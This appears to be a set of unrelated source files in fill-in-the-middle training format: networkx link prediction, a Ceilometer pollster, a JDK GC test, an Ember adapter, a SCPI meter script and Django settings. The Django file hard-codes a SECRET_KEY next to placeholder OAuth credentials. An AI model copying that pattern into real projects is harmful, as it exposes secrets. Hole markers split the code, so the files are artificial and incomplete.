"ip_camera": "mdi:cctv",
"ip_phone": "mdi:phone-voip",
"laptop": "mdi:laptop",
"multimedia_device": "mdi:play-network",
"nas": "mdi:nas",
"networking_device": "mdi:network",
"printer": "mdi:printer",
"router": "mdi:router-wireless",
"smartphone": "mdi:cellphone",
"tablet": "mdi:tablet",
"television": "mdi:television",
"vg_console": "mdi:gamepad-variant",
"workstation": "mdi:desktop-tower-monitor",
}<|fim▁end|> | APP_DESC = {
"app_id": "hass", |
<|file_name|>power_measurement_suite_new.py<|end_file_name|><|fim▁begin|>import SCPI
import time
import numpy
totalSamples = 10
sampleFreq = 100
#freq= SCPI.SCPI("172.17.5.121")
dmm = SCPI.SCPI("172.17.5.131")
#setup freq gen
#freq.setSquare()
#freq.setVoltage(0,3)
#freq.setFrequency(sampleFreq)
#setup voltage meter
#dmm.setVoltageDC("10V", "MAX")
# set external trigger
#dmm.setTriggerSource("INT")
#dmm.setTriggerCount(str(totalSamples))
# wait for trigger
dmm.setInitiate()
dmm.setCurrentDC("500mA", "MAX")<|fim▁hole|>dmm.setTriggerCount(str(totalSamples))
dmm.setInitiate()
time.sleep(1)
#freq.setOutput(1)
currentMeasurements = []
#voltageMeasurements = []
while 1:
if len(currentMeasurements) < totalSamples:
currentMeasurements += dmm.getMeasurements()
if (len(currentMeasurements) >= totalSamples):
break
time.sleep(0.1)
#freq.setOutput(0)
s = 0
for i in range(0, totalSamples):
print float(currentMeasurements[i])
#print "Average Power Consumption: ", s/float(totalSamples), "W avg volt: ", numpy.mean(voltageMeasurements), "V avg current: ", numpy.mean(currentMeasurements), "A"<|fim▁end|> | dmm.setTriggerSource("INT") |
<|file_name|>CompleteOperation.java<|end_file_name|><|fim▁begin|>/*
* Copyright 2012 Red Hat, Inc. and/or its affiliates.
*
* Licensed under the Eclipse Public License version 1.0, available at
* http://www.eclipse.org/legal/epl-v10.html
*/
package org.jboss.aesh.complete;
import org.jboss.aesh.console.AeshContext;
import org.jboss.aesh.parser.Parser;
import org.jboss.aesh.terminal.TerminalString;
import java.util.ArrayList;
import java.util.List;
/**
* A payload object to store completion data
*
* @author Ståle W. Pedersen <[email protected]>
*/
public class CompleteOperation {
private String buffer;
private int cursor;
private int offset;
private List<TerminalString> completionCandidates;
private boolean trimmed = false;
private boolean ignoreStartsWith = false;
private String nonTrimmedBuffer;
private AeshContext aeshContext;
private char separator = ' ';
private boolean appendSeparator = true;
private boolean ignoreOffset = false;
public CompleteOperation(AeshContext aeshContext, String buffer, int cursor) {
this.aeshContext = aeshContext;
setCursor(cursor);
setSeparator(' ');
doAppendSeparator(true);
completionCandidates = new ArrayList<>();
setBuffer(buffer);
}
public String getBuffer() {
return buffer;
}
private void setBuffer(String buffer) {
if(buffer != null && buffer.startsWith(" ")) {
trimmed = true;
this.buffer = Parser.trimInFront(buffer);
nonTrimmedBuffer = buffer;
setCursor(cursor - getTrimmedSize());
}
else
this.buffer = buffer;
}
public boolean isTrimmed() {
return trimmed;
}
public int getTrimmedSize() {
return nonTrimmedBuffer.length() - buffer.length();
}
public String getNonTrimmedBuffer() {
return nonTrimmedBuffer;
}
public int getCursor() {
return cursor;
}
private void setCursor(int cursor) {
if(cursor < 0)
this.cursor = 0;
else
this.cursor = cursor;
}
public int getOffset() {
return offset;
}
public void setOffset(int offset) {
this.offset = offset;
}
public void setIgnoreOffset(boolean ignoreOffset) {
this.ignoreOffset = ignoreOffset;
}
public boolean doIgnoreOffset() {
return ignoreOffset;
}
public AeshContext getAeshContext() {
return aeshContext;
}
/**
* Get the separator character, by default its space
*
* @return separator
*/
public char getSeparator() {
return separator;
}
/**
* By default the separator is one space char, but
* it can be overridden here.
*
* @param separator separator
*/
public void setSeparator(char separator) {
this.separator = separator;
}
/**
* Do this completion allow for appending a separator
* after completion? By default this is true.
*
* @return appendSeparator
*/
public boolean hasAppendSeparator() {
return appendSeparator;
}
/**
* Set if this CompletionOperation would allow an separator to<|fim▁hole|> public void doAppendSeparator(boolean appendSeparator) {
this.appendSeparator = appendSeparator;
}
public List<TerminalString> getCompletionCandidates() {
return completionCandidates;
}
public void setCompletionCandidates(List<String> completionCandidates) {
addCompletionCandidates(completionCandidates);
}
public void setCompletionCandidatesTerminalString(List<TerminalString> completionCandidates) {
this.completionCandidates = completionCandidates;
}
public void addCompletionCandidate(TerminalString completionCandidate) {
this.completionCandidates.add(completionCandidate);
}
public void addCompletionCandidate(String completionCandidate) {
addStringCandidate(completionCandidate);
}
public void addCompletionCandidates(List<String> completionCandidates) {
addStringCandidates(completionCandidates);
}
public void addCompletionCandidatesTerminalString(List<TerminalString> completionCandidates) {
this.completionCandidates.addAll(completionCandidates);
}
public void removeEscapedSpacesFromCompletionCandidates() {
Parser.switchEscapedSpacesToSpacesInTerminalStringList(getCompletionCandidates());
}
private void addStringCandidate(String completionCandidate) {
this.completionCandidates.add(new TerminalString(completionCandidate, true));
}
private void addStringCandidates(List<String> completionCandidates) {
for(String s : completionCandidates)
addStringCandidate(s);
}
public List<String> getFormattedCompletionCandidates() {
List<String> fixedCandidates = new ArrayList<String>(completionCandidates.size());
for(TerminalString c : completionCandidates) {
if(!ignoreOffset && offset < cursor) {
int pos = cursor - offset;
if(c.getCharacters().length() >= pos)
fixedCandidates.add(c.getCharacters().substring(pos));
else
fixedCandidates.add("");
}
else {
fixedCandidates.add(c.getCharacters());
}
}
return fixedCandidates;
}
public List<TerminalString> getFormattedCompletionCandidatesTerminalString() {
List<TerminalString> fixedCandidates = new ArrayList<TerminalString>(completionCandidates.size());
for(TerminalString c : completionCandidates) {
if(!ignoreOffset && offset < cursor) {
int pos = cursor - offset;
if(c.getCharacters().length() >= pos) {
TerminalString ts = c;
ts.setCharacters(c.getCharacters().substring(pos));
fixedCandidates.add(ts);
}
else
fixedCandidates.add(new TerminalString("", true));
}
else {
fixedCandidates.add(c);
}
}
return fixedCandidates;
}
public String getFormattedCompletion(String completion) {
if(offset < cursor) {
int pos = cursor - offset;
if(completion.length() > pos)
return completion.substring(pos);
else
return "";
}
else
return completion;
}
public boolean isIgnoreStartsWith() {
return ignoreStartsWith;
}
public void setIgnoreStartsWith(boolean ignoreStartsWith) {
this.ignoreStartsWith = ignoreStartsWith;
}
@Override
public String toString() {
StringBuilder sb = new StringBuilder();
sb.append("Buffer: ").append(buffer)
.append(", Cursor:").append(cursor)
.append(", Offset:").append(offset)
.append(", IgnoreOffset:").append(ignoreOffset)
.append(", Append separator: ").append(appendSeparator)
.append(", Candidates:").append(completionCandidates);
return sb.toString();
}
}<|fim▁end|> | * be appended. By default this is true.
*
* @param appendSeparator appendSeparator
*/ |
<|file_name|>link_prediction.py<|end_file_name|><|fim▁begin|>"""
Link prediction algorithms.
"""
from math import log
import networkx as nx
from networkx.utils import not_implemented_for<|fim▁hole|>
__all__ = ['resource_allocation_index',
'jaccard_coefficient',
'adamic_adar_index',
'preferential_attachment',
'cn_soundarajan_hopcroft',
'ra_index_soundarajan_hopcroft',
'within_inter_cluster']
def _apply_prediction(G, func, ebunch=None):
"""Applies the given function to each edge in the specified iterable
of edges.
`G` is an instance of :class:`networkx.Graph`.
`func` is a function on two inputs, each of which is a node in the
graph. The function can return anything, but it should return a
value representing a prediction of the likelihood of a "link"
joining the two nodes.
`ebunch` is an iterable of pairs of nodes. If not specified, all
non-edges in the graph `G` will be used.
"""
if ebunch is None:
ebunch = nx.non_edges(G)
return ((u, v, func(u, v)) for u, v in ebunch)
@not_implemented_for('directed')
@not_implemented_for('multigraph')
def resource_allocation_index(G, ebunch=None):
r"""Compute the resource allocation index of all node pairs in ebunch.
Resource allocation index of `u` and `v` is defined as
.. math::
\sum_{w \in \Gamma(u) \cap \Gamma(v)} \frac{1}{|\Gamma(w)|}
where $\Gamma(u)$ denotes the set of neighbors of $u$.
Parameters
----------
G : graph
A NetworkX undirected graph.
ebunch : iterable of node pairs, optional (default = None)
Resource allocation index will be computed for each pair of
nodes given in the iterable. The pairs must be given as
2-tuples (u, v) where u and v are nodes in the graph. If ebunch
is None then all non-existent edges in the graph will be used.
Default value: None.
Returns
-------
piter : iterator
An iterator of 3-tuples in the form (u, v, p) where (u, v) is a
pair of nodes and p is their resource allocation index.
Examples
--------
>>> import networkx as nx
>>> G = nx.complete_graph(5)
>>> preds = nx.resource_allocation_index(G, [(0, 1), (2, 3)])
>>> for u, v, p in preds:
... '(%d, %d) -> %.8f' % (u, v, p)
...
'(0, 1) -> 0.75000000'
'(2, 3) -> 0.75000000'
References
----------
.. [1] T. Zhou, L. Lu, Y.-C. Zhang.
Predicting missing links via local information.
Eur. Phys. J. B 71 (2009) 623.
https://arxiv.org/pdf/0901.0553.pdf
"""
def predict(u, v):
return sum(1 / G.degree(w) for w in nx.common_neighbors(G, u, v))
return _apply_prediction(G, predict, ebunch)
@not_implemented_for('directed')
@not_implemented_for('multigraph')
def jaccard_coefficient(G, ebunch=None):
r"""Compute the Jaccard coefficient of all node pairs in ebunch.
Jaccard coefficient of nodes `u` and `v` is defined as
.. math::
\frac{|\Gamma(u) \cap \Gamma(v)|}{|\Gamma(u) \cup \Gamma(v)|}
where $\Gamma(u)$ denotes the set of neighbors of $u$.
Parameters
----------
G : graph
A NetworkX undirected graph.
ebunch : iterable of node pairs, optional (default = None)
Jaccard coefficient will be computed for each pair of nodes
given in the iterable. The pairs must be given as 2-tuples
(u, v) where u and v are nodes in the graph. If ebunch is None
then all non-existent edges in the graph will be used.
Default value: None.
Returns
-------
piter : iterator
An iterator of 3-tuples in the form (u, v, p) where (u, v) is a
pair of nodes and p is their Jaccard coefficient.
Examples
--------
>>> import networkx as nx
>>> G = nx.complete_graph(5)
>>> preds = nx.jaccard_coefficient(G, [(0, 1), (2, 3)])
>>> for u, v, p in preds:
... '(%d, %d) -> %.8f' % (u, v, p)
...
'(0, 1) -> 0.60000000'
'(2, 3) -> 0.60000000'
References
----------
.. [1] D. Liben-Nowell, J. Kleinberg.
The Link Prediction Problem for Social Networks (2004).
http://www.cs.cornell.edu/home/kleinber/link-pred.pdf
"""
def predict(u, v):
union_size = len(set(G[u]) | set(G[v]))
if union_size == 0:
return 0
return len(list(nx.common_neighbors(G, u, v))) / union_size
return _apply_prediction(G, predict, ebunch)
@not_implemented_for('directed')
@not_implemented_for('multigraph')
def adamic_adar_index(G, ebunch=None):
r"""Compute the Adamic-Adar index of all node pairs in ebunch.
Adamic-Adar index of `u` and `v` is defined as
.. math::
\sum_{w \in \Gamma(u) \cap \Gamma(v)} \frac{1}{\log |\Gamma(w)|}
where $\Gamma(u)$ denotes the set of neighbors of $u$.
This index leads to zero-division for nodes only connected via self-loops.
It is intended to be used when no self-loops are present.
Parameters
----------
G : graph
NetworkX undirected graph.
ebunch : iterable of node pairs, optional (default = None)
Adamic-Adar index will be computed for each pair of nodes given
in the iterable. The pairs must be given as 2-tuples (u, v)
where u and v are nodes in the graph. If ebunch is None then all
non-existent edges in the graph will be used.
Default value: None.
Returns
-------
piter : iterator
An iterator of 3-tuples in the form (u, v, p) where (u, v) is a
pair of nodes and p is their Adamic-Adar index.
Examples
--------
>>> import networkx as nx
>>> G = nx.complete_graph(5)
>>> preds = nx.adamic_adar_index(G, [(0, 1), (2, 3)])
>>> for u, v, p in preds:
... '(%d, %d) -> %.8f' % (u, v, p)
...
'(0, 1) -> 2.16404256'
'(2, 3) -> 2.16404256'
References
----------
.. [1] D. Liben-Nowell, J. Kleinberg.
The Link Prediction Problem for Social Networks (2004).
http://www.cs.cornell.edu/home/kleinber/link-pred.pdf
"""
def predict(u, v):
return sum(1 / log(G.degree(w)) for w in nx.common_neighbors(G, u, v))
return _apply_prediction(G, predict, ebunch)
@not_implemented_for('directed')
@not_implemented_for('multigraph')
def preferential_attachment(G, ebunch=None):
r"""Compute the preferential attachment score of all node pairs in ebunch.
Preferential attachment score of `u` and `v` is defined as
.. math::
|\Gamma(u)| |\Gamma(v)|
where $\Gamma(u)$ denotes the set of neighbors of $u$.
Parameters
----------
G : graph
NetworkX undirected graph.
ebunch : iterable of node pairs, optional (default = None)
Preferential attachment score will be computed for each pair of
nodes given in the iterable. The pairs must be given as
2-tuples (u, v) where u and v are nodes in the graph. If ebunch
is None then all non-existent edges in the graph will be used.
Default value: None.
Returns
-------
piter : iterator
An iterator of 3-tuples in the form (u, v, p) where (u, v) is a
pair of nodes and p is their preferential attachment score.
Examples
--------
>>> import networkx as nx
>>> G = nx.complete_graph(5)
>>> preds = nx.preferential_attachment(G, [(0, 1), (2, 3)])
>>> for u, v, p in preds:
... '(%d, %d) -> %d' % (u, v, p)
...
'(0, 1) -> 16'
'(2, 3) -> 16'
References
----------
.. [1] D. Liben-Nowell, J. Kleinberg.
The Link Prediction Problem for Social Networks (2004).
http://www.cs.cornell.edu/home/kleinber/link-pred.pdf
"""
def predict(u, v):
return G.degree(u) * G.degree(v)
return _apply_prediction(G, predict, ebunch)
@not_implemented_for('directed')
@not_implemented_for('multigraph')
def cn_soundarajan_hopcroft(G, ebunch=None, community='community'):
r"""Count the number of common neighbors of all node pairs in ebunch
using community information.
For two nodes $u$ and $v$, this function computes the number of
common neighbors and bonus one for each common neighbor belonging to
the same community as $u$ and $v$. Mathematically,
.. math::
|\Gamma(u) \cap \Gamma(v)| + \sum_{w \in \Gamma(u) \cap \Gamma(v)} f(w)
where $f(w)$ equals 1 if $w$ belongs to the same community as $u$
and $v$ or 0 otherwise and $\Gamma(u)$ denotes the set of
neighbors of $u$.
Parameters
----------
G : graph
A NetworkX undirected graph.
ebunch : iterable of node pairs, optional (default = None)
The score will be computed for each pair of nodes given in the
iterable. The pairs must be given as 2-tuples (u, v) where u
and v are nodes in the graph. If ebunch is None then all
non-existent edges in the graph will be used.
Default value: None.
community : string, optional (default = 'community')
Nodes attribute name containing the community information.
G[u][community] identifies which community u belongs to. Each
node belongs to at most one community. Default value: 'community'.
Returns
-------
piter : iterator
An iterator of 3-tuples in the form (u, v, p) where (u, v) is a
pair of nodes and p is their score.
Examples
--------
>>> import networkx as nx
>>> G = nx.path_graph(3)
>>> G.nodes[0]['community'] = 0
>>> G.nodes[1]['community'] = 0
>>> G.nodes[2]['community'] = 0
>>> preds = nx.cn_soundarajan_hopcroft(G, [(0, 2)])
>>> for u, v, p in preds:
... '(%d, %d) -> %d' % (u, v, p)
'(0, 2) -> 2'
References
----------
.. [1] Sucheta Soundarajan and John Hopcroft.
Using community information to improve the precision of link
prediction methods.
In Proceedings of the 21st international conference companion on
World Wide Web (WWW '12 Companion). ACM, New York, NY, USA, 607-608.
http://doi.acm.org/10.1145/2187980.2188150
"""
def predict(u, v):
Cu = _community(G, u, community)
Cv = _community(G, v, community)
cnbors = list(nx.common_neighbors(G, u, v))
neighbors = (sum(_community(G, w, community) == Cu for w in cnbors)
if Cu == Cv else 0)
return len(cnbors) + neighbors
return _apply_prediction(G, predict, ebunch)
@not_implemented_for('directed')
@not_implemented_for('multigraph')
def ra_index_soundarajan_hopcroft(G, ebunch=None, community='community'):
    r"""Compute the community-aware resource allocation index of all
    node pairs in ebunch.

    For two nodes $u$ and $v$, only common neighbors that belong to the
    same community as both endpoints contribute to the score; each such
    neighbor $w$ adds $1 / |\Gamma(w)|$, where $\Gamma(w)$ denotes the
    set of neighbors of $w$.

    Parameters
    ----------
    G : graph
        A NetworkX undirected graph.

    ebunch : iterable of node pairs, optional (default = None)
        Pairs (u, v) of nodes in ``G`` for which the score is computed.
        If None, all non-existent edges in the graph are used.

    community : string, optional (default = 'community')
        Node attribute holding the community information; each node
        belongs to at most one community.

    Returns
    -------
    piter : iterator
        An iterator of 3-tuples in the form (u, v, p) where (u, v) is a
        pair of nodes and p is their score.

    Examples
    --------
    >>> import networkx as nx
    >>> G = nx.Graph()
    >>> G.add_edges_from([(0, 1), (0, 2), (1, 3), (2, 3)])
    >>> G.nodes[0]['community'] = 0
    >>> G.nodes[1]['community'] = 0
    >>> G.nodes[2]['community'] = 1
    >>> G.nodes[3]['community'] = 0
    >>> preds = nx.ra_index_soundarajan_hopcroft(G, [(0, 3)])
    >>> for u, v, p in preds:
    ...     '(%d, %d) -> %.8f' % (u, v, p)
    '(0, 3) -> 0.50000000'

    References
    ----------
    .. [1] Sucheta Soundarajan and John Hopcroft.
       Using community information to improve the precision of link
       prediction methods.
       In Proceedings of the 21st international conference companion on
       World Wide Web (WWW '12 Companion). ACM, New York, NY, USA, 607-608.
       http://doi.acm.org/10.1145/2187980.2188150
    """
    def predict(u, v):
        # Pairs whose endpoints live in different communities score zero.
        u_community = _community(G, u, community)
        v_community = _community(G, v, community)
        if u_community != v_community:
            return 0
        # Accumulate 1/degree over common neighbors sharing the community.
        score = 0
        for w in nx.common_neighbors(G, u, v):
            if _community(G, w, community) == u_community:
                score += 1 / G.degree(w)
        return score

    return _apply_prediction(G, predict, ebunch)
@not_implemented_for('directed')
@not_implemented_for('multigraph')
def within_inter_cluster(G, ebunch=None, delta=0.001, community='community'):
    """Compute the ratio of within- to inter-cluster common neighbors
    of all node pairs in ebunch.

    A common neighbor `w` of `u` and `v` counts as *within-cluster* when
    it shares the endpoints' community, and as *inter-cluster* otherwise.
    The WIC measure [1]_ is the size ratio of those two sets, with
    ``delta`` guarding against division by zero.

    Parameters
    ----------
    G : graph
        A NetworkX undirected graph.

    ebunch : iterable of node pairs, optional (default = None)
        Pairs (u, v) of nodes in ``G`` for which the WIC measure is
        computed. If None, all non-existent edges in the graph are used.

    delta : float, optional (default = 0.001)
        Value to prevent division by zero in case there is no
        inter-cluster common neighbor between two nodes. See [1]_.

    community : string, optional (default = 'community')
        Node attribute holding the community information; each node
        belongs to at most one community.

    Returns
    -------
    piter : iterator
        An iterator of 3-tuples in the form (u, v, p) where (u, v) is a
        pair of nodes and p is their WIC measure.

    Examples
    --------
    >>> import networkx as nx
    >>> G = nx.Graph()
    >>> G.add_edges_from([(0, 1), (0, 2), (0, 3), (1, 4), (2, 4), (3, 4)])
    >>> G.nodes[0]['community'] = 0
    >>> G.nodes[1]['community'] = 1
    >>> G.nodes[2]['community'] = 0
    >>> G.nodes[3]['community'] = 0
    >>> G.nodes[4]['community'] = 0
    >>> preds = nx.within_inter_cluster(G, [(0, 4)])
    >>> for u, v, p in preds:
    ...     '(%d, %d) -> %.8f' % (u, v, p)
    ...
    '(0, 4) -> 1.99800200'
    >>> preds = nx.within_inter_cluster(G, [(0, 4)], delta=0.5)
    >>> for u, v, p in preds:
    ...     '(%d, %d) -> %.8f' % (u, v, p)
    ...
    '(0, 4) -> 1.33333333'

    References
    ----------
    .. [1] Jorge Carlos Valverde-Rebaza and Alneu de Andrade Lopes.
       Link prediction in complex networks based on cluster information.
       In Proceedings of the 21st Brazilian conference on Advances in
       Artificial Intelligence (SBIA'12)
       https://doi.org/10.1007/978-3-642-34459-6_10
    """
    if delta <= 0:
        raise nx.NetworkXAlgorithmError('Delta must be greater than zero')

    def predict(u, v):
        u_community = _community(G, u, community)
        v_community = _community(G, v, community)
        # Pairs spanning two communities have no within-cluster neighbors.
        if u_community != v_community:
            return 0
        # Tally common neighbors inside vs. outside the shared community.
        within = 0
        inter = 0
        for w in nx.common_neighbors(G, u, v):
            if _community(G, w, community) == u_community:
                within += 1
            else:
                inter += 1
        return within / (inter + delta)

    return _apply_prediction(G, predict, ebunch)
def _community(G, u, community):
"""Get the community of the given node."""
node_u = G.nodes[u]
try:
return node_u[community]
except KeyError:
raise nx.NetworkXAlgorithmError('No community information')<|fim▁end|> | |
<|file_name|>application.js<|end_file_name|><|fim▁begin|>import Ember from 'ember';
import DS from 'ember-data';
import DataAdapterMixin from 'ember-simple-auth/mixins/data-adapter-mixin';
export default DS.RESTAdapter.extend(DataAdapterMixin, {
authorizer: 'authorizer:dspace',
initENVProperties: Ember.on('init', function() {
let ENV = this.container.lookupFactory('config:environment');
if (Ember.isPresent(ENV.namespace)) {
this.set('namespace', ENV.namespace);
}
if (Ember.isPresent(ENV.host)) {
this.set('host', ENV.host);
}
}),
//coalesceFindRequests: true, -> commented out, because it only works for some endpoints (e.g. items) and not others (e.g. communities)
ajax(url, type, hash) {
if (Ember.isEmpty(hash)) {
hash = {};
}
if (Ember.isEmpty(hash.data)) {
hash.data = {};
}
if (type === "GET") {<|fim▁hole|>});<|fim▁end|> | hash.data.expand = 'all'; //add ?expand=all to all GET calls
}
return this._super(url, type, hash);
} |
<|file_name|>floatingip.py<|end_file_name|><|fim▁begin|># Copyright 2016 Sungard Availability Services
# Copyright 2016 Red Hat
# Copyright 2012 eNovance <[email protected]>
# Copyright 2013 IBM Corp
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#<|fim▁hole|># License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from oslo_log import log
from oslo_utils import timeutils
from ceilometer.agent import plugin_base
from ceilometer.i18n import _LW
from ceilometer import neutron_client
from ceilometer import sample
LOG = log.getLogger(__name__)
cfg.CONF.import_group('service_types', 'ceilometer.neutron_client')
class FloatingIPPollster(plugin_base.PollsterBase):
    """Pollster that emits one ``ip.floating`` gauge sample per floating IP.

    The sample volume encodes the IP's Neutron status via the STATUS map.
    """

    # Neutron floating-IP status (lower-cased) -> numeric sample volume.
    STATUS = {
        'inactive': 0,
        'active': 1,
        'pending_create': 2,
    }

    def __init__(self):
        # Neutron API client used to enumerate floating IPs on every poll.
        self.neutron_cli = neutron_client.Client()

    @property
    def default_discovery(self):
        # Discover endpoints for the configured neutron service type.
        return 'endpoint:%s' % cfg.CONF.service_types.neutron

    @staticmethod
    def _form_metadata_for_fip(fip):
        """Return a metadata dictionary for the fip usage data."""
        # NOTE(review): assumes ``fip`` is a Neutron floating-IP dict;
        # any missing key degrades to None via .get().
        metadata = {
            'router_id': fip.get("router_id"),
            'status': fip.get("status"),
            'floating_network_id': fip.get("floating_network_id"),
            'fixed_ip_address': fip.get("fixed_ip_address"),
            'port_id': fip.get("port_id"),
            'floating_ip_address': fip.get("floating_ip_address")
        }
        return metadata

    def get_samples(self, manager, cache, resources):
        """Yield one gauge sample per floating IP known to Neutron.

        Floating IPs whose status is not listed in STATUS are logged
        with a warning and skipped.
        """
        for fip in self.neutron_cli.fip_get_all():
            status = self.STATUS.get(fip['status'].lower())
            if status is None:
                LOG.warning(_LW("Invalid status, skipping IP address %s") %
                            fip['floating_ip_address'])
                continue
            res_metadata = self._form_metadata_for_fip(fip)
            yield sample.Sample(
                name='ip.floating',
                type=sample.TYPE_GAUGE,
                unit='ip',
                volume=status,
                user_id=fip.get('user_id'),
                project_id=fip['tenant_id'],
                resource_id=fip['id'],
                timestamp=timeutils.utcnow().isoformat(),
                resource_metadata=res_metadata
            )<|fim▁end|>
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the |
<|file_name|>TestVerifySilently.java<|end_file_name|><|fim▁begin|>/*
* Copyright (c) 2014, 2015, Oracle and/or its affiliates. All rights reserved.
* DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER.
*
* This code is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License version 2 only, as
* published by the Free Software Foundation.
*
* This code is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
* version 2 for more details (a copy is included in the LICENSE file that
* accompanied this code).
*
* You should have received a copy of the GNU General Public License version
* 2 along with this work; if not, write to the Free Software Foundation,
* Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
*
* Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA
* or visit www.oracle.com if you need additional information or have any
* questions.
*/
/* @test TestVerifySilently.java
* @key gc
* @bug 8032771
* @summary Test silent verification.
* @library /testlibrary
* @modules java.base/sun.misc
* java.management
*/
import jdk.test.lib.OutputAnalyzer;
import jdk.test.lib.ProcessTools;
import java.util.ArrayList;
import java.util.Collections;
class RunSystemGC {
public static void main(String args[]) throws Exception {
System.gc();
}
}
public class TestVerifySilently {
private static String[] getTestJavaOpts() {
String testVmOptsStr = System.getProperty("test.java.opts");
if (!testVmOptsStr.isEmpty()) {
return testVmOptsStr.split(" ");
} else {
return new String[] {};
}
}
private static OutputAnalyzer runTest(boolean verifySilently) throws Exception {
ArrayList<String> vmOpts = new ArrayList();
Collections.addAll(vmOpts, getTestJavaOpts());
Collections.addAll(vmOpts, new String[] {"-XX:+UnlockDiagnosticVMOptions",
"-XX:+VerifyDuringStartup",
"-XX:+VerifyBeforeGC",
"-XX:+VerifyAfterGC",<|fim▁hole|> OutputAnalyzer output = new OutputAnalyzer(pb.start());
System.out.println("Output:\n" + output.getOutput());
return output;
}
public static void main(String args[]) throws Exception {
OutputAnalyzer output;
output = runTest(false);
output.shouldContain("Verifying");
output.shouldHaveExitValue(0);
output = runTest(true);
output.shouldNotContain("Verifying");
output.shouldHaveExitValue(0);
}
}<|fim▁end|> | (verifySilently ? "-Xlog:gc":"-Xlog:gc+verify=debug"),
RunSystemGC.class.getName()});
ProcessBuilder pb =
ProcessTools.createJavaProcessBuilder(vmOpts.toArray(new String[vmOpts.size()])); |
<|file_name|>settings.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
#
# ask-undrgz system of questions uses data from underguiz.
# Copyright (c) 2010, Nycholas de Oliveira e Oliveira <[email protected]>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# # Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# # Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# # Neither the name of the Nycholas de Oliveira e Oliveira nor the names of
# its contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# Django settings for ask_undrgz project.
import os
ROOT_PATH = os.path.realpath(os.path.dirname(__file__))
DEBUG = False
TEMPLATE_DEBUG = DEBUG
ADMINS = (<|fim▁hole|> ('Nycholas de Oliveira e Oliveira', '[email protected]'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.', # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.
'NAME': '', # Or path to database file if using sqlite3.
'USER': '', # Not used with sqlite3.
'PASSWORD': '', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
}
}
# Twitter
TWITTER_USERNAME = 'ask_undrgz'
TWITTER_PASSWORD = 'XXX'
TWITTER_CONSUMER_KEY = 'XXX'
TWITTER_CONSUMER_SECRET = 'XXX'
TWITTER_OAUTH_TOKEN = 'XXX'
TWITTER_OAUTH_TOKEN_SECRET = 'XXX'
TWITTER_CALLBACK = 'http://ask-undrgz.appspot.com/_oauth/twitter/callback/'
if DEBUG:
TWITTER_CALLBACK = 'http://localhost:8080/_oauth/twitter/callback/'
ugettext = lambda s: s
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
LANGUAGES = (
('en', ugettext('English')),
('pt-BR', ugettext('Portuguese Brazil')),
)
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale
USE_L10N = True
# Absolute path to the directory that holds media.
# Example: "/home/media/media.lawrence.com/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash if there is a path component (optional in other cases).
# Examples: "http://media.lawrence.com", "http://example.com/media/"
MEDIA_URL = ''
# URL prefix for admin media -- CSS, JavaScript and images. Make sure to use a
# trailing slash.
# Examples: "http://foo.com/media/", "/media/".
ADMIN_MEDIA_PREFIX = '/media/'
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'ti*(j(^fvi!&1cu7#sw7mkhb=dgl5v_$1&v5=wom_l4y!x9j*@'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
